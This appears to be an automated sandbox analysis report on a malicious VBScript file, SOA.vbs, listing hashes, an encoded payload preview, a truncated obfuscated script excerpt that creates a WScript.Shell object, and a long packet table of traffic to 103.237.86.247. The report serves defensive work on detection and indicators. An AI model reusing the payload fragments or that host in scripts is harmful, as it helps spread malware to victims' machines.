                    Preview:cQGbcQGbuwvbDABxAZtxAZsDXCQEcQGbcQGbuV0yzrhxAZtxAZuB8f5ufu/rAqxocQGbgemjXLBX6wKKnXEBm3EBm+sCf766RI+2rnEBm3EBm+sCJ8TrAtstMcpxAZvrAj5SiRQL6wI/x+sCgObR4usChOlxAZuDwQTrAnqc6wIxcYH5tQc1BHzI6wJfDXEBm4tEJARxAZvrAk+5icPrAply6wKuY4HD4TK5AusCF3txAZu6j3fBKnEBm3EBm4Hy+EkUpXEBm3EBm4HCicEqcOsCY35xAZtxAZvrAiaWcQGb6wL1JIsMEOsCAVRxAZuJDBPrAgyucQGbQnEBm+sCoteB+sDMBAB11XEBm3EBm4lcJAzrAkkfcQGbge0AAwAAcQGbcQGbi1QkCHEBm+sCchOLfCQE6wLAIOsC41KJ63EBm3EBm4HDnAAAAOsC3gFxAZtTcQGb6wLUSGpAcQGb6wKSqYnrcQGbcQGbx4MAAQAAAPBEBHEBm3EBm4HDAAEAAOsCcOVxAZtTcQGb6wLx2YnrcQGbcQGbibsEAQAAcQGbcQGbgcMEAQAAcQGbcQGbU+sCllDrAsTnav/rAnBZcQGbg8IF6wL94XEBmzH26wLBxXEBmzHJ6wJ8mnEBm4sacQGbcQGbQXEBm+sCEX45HAp18+sC9V3rAmv8RusCrfpxAZuAfAr7uHXccQGb6wIHS4tECvxxAZtxAZsp8HEBm3EBm//ScQGbcQGbusDMBABxAZtxAZsxwHEBm+sCqBKLfCQM6wLmK+sCZGeBNAdIo+vJ6wJqkXEBm4PABOsCRGRxAZs50HXkcQGbcQGbiftxAZvrAsXw/9dxAZvrAnhTzESNTIjFbhnBRiyM0IfA/fgirlGzhR6rydZzGnkBu0g9Oyepw+CnNgU7njMdKg5MmxpznoGBajjkW/JJcGBqIMXzlFDJSmSXGaosjUWjtzbeU9IQyc/myS/K5MdwVmqlRaNm5ppXao1Fo3NQArGN

                    Static File Info

                    General

                    File type:ASCII text, with CRLF line terminators
                    Entropy (8bit):5.37400819354661
                    TrID:
                    • Visual Basic Script (13500/0) 100.00%
                    File name:SOA.vbs
                    File size:26'335 bytes
                    MD5:5eb7f6fdbef3c0d5203a8a04a09f2b39
                    SHA1:6931cbc28345d13ca66694f5059c05d4f8889f73
                    SHA256:9bb93f41ee5ed09fe6ad9c7c150dbc06280ee08f746d9a1ac9da501d7ad53c9e
                    SHA512:fb321daa951f1aa535e42400ae0eb3eb3edf6b0b612e942c1546031ec9e2bda5f8975f91701f02d752e1081e3df12f4118fc78e0498a215aba00cee95e46e1bb
                    SSDEEP:384:27HI3TA6FM4YAeylXIOwdc+FKneZ+rdu2PtaP8BrP/NeLEmG:fTMo6F2lnn0WhBrPVeQr
                    TLSH:91C20DE01D010FB869B73B75E94D3EA460B0AEB70F3BB833395C6228740566F3D99596
                    File Content Preview:....Rapsoderreptatorystet203="Defaitistiske"..Spioniformiatrihalidefris210 = LCAse(Rapsoderreptatorystet203)......Diftongerer = interpretability......Set Deklarationspligterne = CreateObject("WScript.Shell")......Call Udtagelseskampes("cls;write 'Knyttelv

                    File Icon

                    Icon Hash:68d69b8f86ab9a86

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 2, 2024 07:50:06.076206923 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:06.081101894 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:06.081186056 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:06.081440926 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:06.086251974 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.757395983 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.757420063 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.757437944 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.757466078 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.757580042 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.757633924 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.757673025 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.757684946 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.757716894 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.757726908 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.757754087 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.758057117 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.758095980 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.764110088 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.764168024 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.764168978 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.764179945 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.764244080 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.764333010 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.764343977 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.764388084 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.764763117 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.764774084 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.764786959 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.764818907 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.764928102 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.764977932 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.765244961 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.765316963 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.765332937 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.765355110 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.765482903 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.765495062 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.765521049 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.766272068 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.766318083 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.766377926 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.766416073 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.766427040 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.766472101 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.769001961 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.769047022 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.769052982 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.769188881 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.769232988 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.769243002 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.769254923 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.769290924 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.769323111 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.814975023 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.868052006 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.868078947 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.868092060 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.868104935 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.868119001 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.868155003 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.868160963 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.868247032 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.868259907 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.868283033 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.868392944 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.868403912 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.868416071 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.868429899 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.868431091 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.868475914 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.868649960 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.868660927 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.868670940 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.868695021 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.868736029 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.869009018 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.869066000 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.869076967 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.869102955 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.869209051 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.869220018 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.869230986 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:07.869254112 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:07.869287968 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.128901005 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.128933907 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.128957033 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.128968954 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.128981113 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.129003048 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.129057884 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.129070044 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.129076958 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.129081964 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.129096985 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.129276037 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.129288912 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.129301071 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.129307985 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.129370928 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.129646063 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.129709959 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.129713058 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.129723072 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.129781961 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.129842997 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.129858017 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.130012035 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.130040884 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.130090952 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.130101919 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.130173922 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.130283117 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.130295992 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.130306959 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.130368948 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.130368948 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.130521059 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.130578995 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.130594969 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.130723000 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.130739927 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.130752087 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.130763054 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.130774021 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.130800009 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.130862951 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.223329067 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.268198967 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.389832020 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.389848948 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.389859915 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.389879942 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.389931917 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.389961958 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.390042067 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.390053988 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.390064955 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.390073061 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.390260935 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.390271902 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.390284061 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.390289068 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.390295029 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.390305996 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.390501022 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.390502930 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.390584946 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.390646935 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.390736103 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.390748024 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.390861034 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.390887976 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.390901089 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.390911102 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.390990019 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.391066074 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.391077042 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.391087055 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.391165018 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.391340017 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.391396046 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.391410112 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.391419888 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.391486883 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.391539097 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.391551018 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.391608953 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.391628981 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.391694069 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.391705036 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.391716003 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.391726971 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.391760111 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.391805887 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.392151117 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.392196894 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.392208099 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.392220974 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.392268896 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.392340899 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.392352104 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.392363071 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.392503023 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.651112080 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.651129961 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.651148081 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.651200056 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.651211023 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.651221991 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.651231050 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.651264906 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.651273012 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.651443005 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.651453972 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.651464939 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.651472092 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.651546955 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.651546955 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.651612997 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.651634932 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.651647091 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.651654005 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.651714087 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.651887894 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.651901960 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.652069092 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.652288914 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.652304888 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.652316093 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.652328968 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.652339935 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.652352095 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.652368069 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.652637959 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.652817965 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.652836084 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.652849913 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.652861118 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.652873993 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.652878046 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.652884960 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.652895927 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.652909040 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.652923107 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.653000116 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.653933048 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.653944969 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.653950930 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.653960943 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.653969049 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.654097080 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.654767036 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.654778957 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.654788971 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.654802084 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.654813051 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.654824972 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.654825926 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.654835939 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.654850960 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.654860973 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.654866934 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.654867887 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.654917002 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.654917002 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.655673027 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.655683994 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.655694962 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.655945063 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.911835909 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912000895 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912050962 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912061930 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912079096 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.912168026 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.912192106 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912203074 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912214041 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912225008 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912250996 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.912401915 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.912426949 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912437916 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912448883 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912589073 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912611961 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.912704945 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912720919 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912730932 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.912731886 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912743092 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912755013 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.912763119 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913064957 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913093090 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913104057 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913115025 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913125992 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913137913 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913146019 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913149118 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913160086 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913170099 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913172960 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913192034 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913270950 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913525105 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913564920 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913577080 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913593054 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913660049 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913722038 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913733006 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913744926 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913755894 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.913779020 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.913839102 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.914026022 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.914037943 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.914048910 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.914061069 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.914072037 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.914081097 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.914083958 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.914094925 CEST8049700103.237.86.247192.168.2.7
                    Jul 2, 2024 07:50:08.914103985 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.914118052 CEST4970080192.168.2.7103.237.86.247
                    Jul 2, 2024 07:50:08.917800903 CEST8049700103.237.86.247192.168.2.7
